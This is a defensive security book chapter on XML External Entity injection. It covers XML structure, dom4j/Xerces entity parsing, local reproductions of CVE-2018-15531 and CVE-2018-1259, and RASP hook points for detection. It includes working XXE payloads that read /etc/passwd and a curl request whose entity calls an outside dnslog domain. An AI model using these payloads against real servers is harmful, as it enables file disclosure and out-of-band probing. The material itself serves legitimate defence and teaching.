XXE Injection Principles and Detection
XXE stands for XML External Entity Injection, where an application parses XML input and processes external entities, potentially loading malicious files. This can lead to file reading, command execution, internal network port scanning, attacks on internal websites, and denial-of-service (DoS) attacks.
This chapter first introduces the basic structure of XML and parsing tools, then explains the exploitation principles and defense strategies of XXE, and finally provides hook points and detection algorithms.
14.1 XML Basics
14.1.1 Basic Structure of XML Documents
XML documents follow specific rules and are organized into components, primarily consisting of three parts: the XML declaration, Document Type Definition (DTD, where XXE vulnerabilities reside), and document elements.
- XML Declaration (Optional)
An XML document may begin with an XML declaration, which provides metadata about the document itself, such as version number and character encoding. For example:
<?xml version="1.0" encoding="UTF-8"?>
- Document Type Definition (DTD)
DTD or XML Schema is used to define the valid structure, elements, attributes, and their relationships in a document. A DTD reference might look like this:
<!DOCTYPE rootElement SYSTEM "myDTD.dtd">
Or using XML Schema:
<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema"> <!-- schema definitions go here --></xs:schema>
- Element Structure
Root Element: Every XML document must have exactly one root element, which serves as the container for all other elements.
Child Elements: Elements can contain other elements as their children, forming a hierarchical structure.
Attributes: Elements can have attributes, which are name/value pairs providing additional information about the element.
Text Content: Elements can contain text content or character data (CDATA) sections.
Comments: XML documents can include comments, which do not affect document parsing.
The following XML document includes the basic structure described above:
<?xml version="1.0" encoding="UTF-8"?><!-- This XML document example describes a simple book catalog -->
<!DOCTYPE catalog [ <!ELEMENT catalog (book*)> <!ELEMENT book (title, author+, year)> <!ATTLIST book id ID #REQUIRED> <!ELEMENT title (#PCDATA)> <!ELEMENT author (#PCDATA)> <!ELEMENT year (#PCDATA)>]><catalog> <!-- Book entry starts --> <book id="bk101"> <title>XML Primer</title> <author>Zhang San</author> <author>Li Si</author> <year>2005</year> <description><![CDATA[This book is the perfect guide for XML beginners, covering both basic and advanced XML concepts in detail.]]></description> </book>
<book id="bk102"> <title>Java Programming</title> <author>Wang Wu</author> <year>2009</year> </book> <!-- Book entry ends --></catalog>
14.1.2 XML External Entities
DTD (Document Type Definition) serves to define the legal building blocks of an XML document. A DTD can be declared internally within an XML document or referenced externally.
- Internal Entities
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY bar "hello">]><foo>&bar;</foo>
- External Entities
External entities use the keywords SYSTEM and PUBLIC, indicating the entity originates from local or public services. Example of an external entity:
<?xml version="1.0"?><!DOCTYPE mage[<!ENTITY file SYSTEM "file:///etc/passwd">]><root>&file;</root>
An external entity named ‘file’ is defined in the document constraint section, which is then referenced in the document element section. The format for referencing an entity is: &entity_name;
.
14.2 External Entity Parsing Source Code Analysis
14.2.1 External Entity Injection for File Reading
An xxe.xml document containing external entity injection is shown below:
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [ <!ENTITY firstname SYSTEM "file:///etc/passwd" > ]><user> <firstname>&firstname;</firstname> <lastname>lastname</lastname></user>
Using Dom4j to parse the above XML document, the code is as follows:
import org.dom4j.Document;import org.dom4j.Element;import org.dom4j.io.SAXReader;
import java.io.File;```javapublic class Main { public static void main(String[] args) throws Exception { File file = new File("src/main/resources/xxe.xml"); Document doc = new SAXReader().read(file); Element rootElement = doc.getRootElement(); System.out.println(rootElement.element("firstname").getText()); }}
Output:
### User Database## Note that this file is consulted directly only when the system is running# in single-user mode. At other times this information is provided by# Open Directory.## See the opendirectoryd(8) man page for additional information about# Open Directory.##nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/falseroot:*:0:0:System Administrator:/var/root:/bin/shdaemon:*:1:1:System Services:/var/root:/usr/bin/false_uucp:*:4:4:Unix to Unix Copy Protocol:/var/spool/uucp:/usr/sbin/uucico_taskgated:*:13:13:Task Gate Daemon:/var/empty:/usr/bin/false_networkd:*:24:24:Network Services:/var/networkd:/usr/bin/false
//...Output truncated due to space limitations
14.2.2 Source Code Analysis and Debugging
The complete process of dom4j reading and parsing XML documents consists of three main steps:
14.2.2.1 XML File Path Processing
The primary function of the SAXReader.read method is to obtain the absolute path of the disk XML file and set the resource path for the source object.
Figure 14-1 SAXReader Reading Disk File
The relative path of xxe.xml is src/main/resources/xxe.xml. In line 308 of the above code, it obtains the absolute disk path of the XML file and represents the inputSource’s resource path in URL format. At line 325, it calls an overloaded version of the SAXReader.read method.
14.2.2.2 Creating XmlReader Object
At line 464, the
getXMLReader
method is called to create an XmlReader
object, which is key to parsing XML documents. Let’s examine its implementation. Through debugging, we can see the critical code for creating the XMLReader
as follows:
At line 46, an instance of SAXParserFactory
is obtained, and the factory instance’s newSAXParser
method is called. Since SAXParserFactory
is an abstract class, let’s see how the factory class is instantiated. Its initialization code:
From the code, we can see the factory implementation is SAXParserFactoryImpl
. Let’s examine its newSAXParser
method implementation:
We can observe that in the newSAXParser
method, a SAXParserImpl
object is created, followed by calling the getXmlReader
method as shown below:
The initialization of xmlReader
occurs in the SAXParserImpl
constructor. Let’s examine the constructor method of SAXParserImpl
:
At this point, the class responsible for XML parsing is JAXPSAXParser
, which is a subclass of SAXParser
. Its UML class diagram is as follows:
14.2.2.3 XML Document Parsing
After creating the xmlReader
object, the XML document reading begins.
From the above UML class diagram, we can see that the actual parsing class is JAXPSAXParser
, which is an inner class of SAXParserImpl
. The parse
method is as follows:
It actually calls its parent class’s parser method, implemented as:
At line 1216, we can see it actually calls the parse
method of the XMLParser
class:
In this method, fConfiguration
is responsible for parsing XML. The class to which fConfiguration
belongs is an interface called XMLParserConfiguration
. The UML class diagram for this interface is as follows:
We can see that the actual parsing class is XML11Configuration
, with relevant methods as follows:
Here it actually calls fCurrentScanner.scanDocument
, where the actual document scanning begins:
Looking at the
next
method, we can see that it parses the XML document into individual events:
Our main focus is on the parsing of entity references:
When scanning entity references, the scanEntityReference
method is called. The code for this method is as follows:
At line 1238, the
startEntity
method is called to parse the entity.
The
setupCurrentEntity
method is responsible for parsing entity resources, implemented as follows:
At this point, the debugging of the external entity reference parsing process in XML documents is complete.
14.3 XXE Vulnerability Examples
14.3.1 CVE-2018-15531
- Vulnerability Overview
JavaMelody is a monitoring tool for JAVA applications and application servers (Tomcat, Jboss, Weblogic) in production and QA environments. It provides monitoring data through charts, helping developers and operations teams identify performance bottlenecks and optimize responses. Version 1.74.0 fixed an XXE vulnerability with CVE ID CVE-2018-15531. Attackers could exploit this vulnerability to read sensitive information on the JavaMelody server.
- Affected Versions
Versions < 1.74.0
- Fix Code
Commit link: https://github.com/javamelody/javamelody/commit/ef111822562d0b9365bd3e671a75b65bd0613353
- Vulnerability Environment Setup
Create a simple Springboot project and add the specified version dependency for javamelody in pom.xml.
<dependency> <groupId>net.bull.javamelody</groupId> <artifactId>javamelody-spring-boot-starter</artifactId> <version>1.73.1</version></dependency>
After starting the application, access the monitoring page at http://localhost:8080/monitoring
. The result is as follows:
- Register a DNS domain
Domain: 4yf5lc.dnslog.cn
The request is sent as follows:
curl --location --request POST 'http://localhost:8080' \--header 'Content-type: text/xml' \--header 'SOAPAction: aaaaa' \--data-raw '<?xml version="1.0" encoding="UTF-8" standalone="no" ?><!DOCTYPE root [<!ENTITY % remote SYSTEM "http://www.4yf5lc.dnslog.cn">%remote;]></root>'
Alternatively, you can send the request using Postman:
- Observe the Results
You can see that the dnslog.cn platform has recorded the server’s IP information.
Partial logs intercepted by RASP are shown below:
14.3.2 CVE-2018-1259
- Vulnerability Overview
XMLBeans provides an object view of underlying XML data while allowing access to the original XML information set. When used in combination with XMLBeam 1.4.14 or earlier versions, Spring Data Commons versions 1.13 to 1.13.11 and 2.0 to 2.0.6 do not restrict XML external entity references. This allows unauthenticated remote malicious users to exploit specific parameters in Spring Data’s request binding to access arbitrary files on the system.
- Affected Versions
Spring Data Commons 1.13 to 1.13.11
Spring Data REST 2.6 to 2.6.11
Spring Data Commons 2.0 to 2.0.6
Spring Data REST 3.0 to 3.0.6
- Vulnerability Analysis
The vulnerability fix commit reveals modifications to the DefaultXMLFactoriesConfig file as shown below:
commit: https://github.com/SvenEwald/xmlbeam/commit/f8e943f44961c14cf1316deb56280f7878702ee1
The changes configure default features, disable entity references, and prevent merging multiple XML documents.
- Reproduction
The code is sourced from the official spring-data-examples demo: spring-data-xml-xxe.
- The code originates from the official spring-data-examples project, with key sections as follows:
@RestControllerclass UserController { @ProjectedPayload public interface UserPayload { @XBRead("//firstname") @JsonPath("$..firstname") String getFirstname();
@XBRead("//lastname") @JsonPath("$..lastname") String getLastname(); }``` @PostMapping(value = "/") HttpEntity<String> post(@RequestBody UserPayload user) { return ResponseEntity .ok(String.format("Received firstname: %s, lastname: %s", user.getFirstname(), user.getLastname())); }}
Project pom.xml dependencies:
<dependency> <groupId>org.springframework.data</groupId> <artifactId>spring-data-commons</artifactId> <version>2.0.5.RELEASE</version></dependency>
<dependency> <groupId>com.jayway.jsonpath</groupId> <artifactId>json-path</artifactId></dependency>
<dependency> <groupId>org.xmlbeam</groupId> <artifactId>xmlprojector</artifactId> <version>1.4.13</version></dependency>
If you are familiar with Spring Boot project creation, the above code can build a complete application. After the project is built, compile it into an executable jar package and run it:
mvn clean packagejava -jar ./target/xxe-demo-0.0.1-SNAPSHOT.jar
- Sending Requests
Arbitrary file reading by sending XML format payload via POST: Example:
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY file SYSTEM "file:///etc/passwd" > ]><user><firstname>&file;</firstname><lastname>rasp</lastname></user>
Send the request using Postman as shown below:
- Observing Results
Partial logs intercepted by RASP are as follows:
14.4 Hook Point Selection and Detection Algorithm
14.4.1 Hook Class Selection
Although there are many XML parsing middleware, it’s sufficient to hook the XML entity parsing part. For example, both DOM4J and JAXP tools rely on apache-xerces for XML entity parsing. Relevant hook points are summarized as follows:
- Open-source tool apache.xerces
org.apache.xerces.impl.XMLEntityManager#startEntity(String, org.apache.xerces.xni.parser.XMLInputSource, boolean, boolean)
- Apache Xerces tool within JDK
com.sun.org.apache.xerces.internal.impl.XMLEntityManager#startEntity(boolean, String, com.sun.org.apache.xerces.internal.xni.parser.XMLInputSource, boolean, boolean)
It can be observed that besides the difference in package names, there are also some variations in the parameter lists between the two hook points mentioned above.
- Open-source tool wstx
com.ctc.wstx.sr.StreamScanner#expandEntity(com.ctc.wstx.ent.EntityDecl, boolean)
14.4.2 Detection Algorithm
XXE vulnerabilities in Java have limited exploitable protocols. All supported protocols are under the sun.net.www.protocol package. The protocols supported by JDK8 and JDK11 are as follows:
JDK11: jmod, jrt, mailto, file, ftp, http, https, jar;
JDK8: mailto, netdoc, file, ftp, http, https, jar;
The detection can be performed by obtaining the protocol name, path, and host name of external entity resources respectively. The parameter acquisition and detection are as follows:
The method to obtain parameters is shown below:
The algorithm for parameter detection is as follows: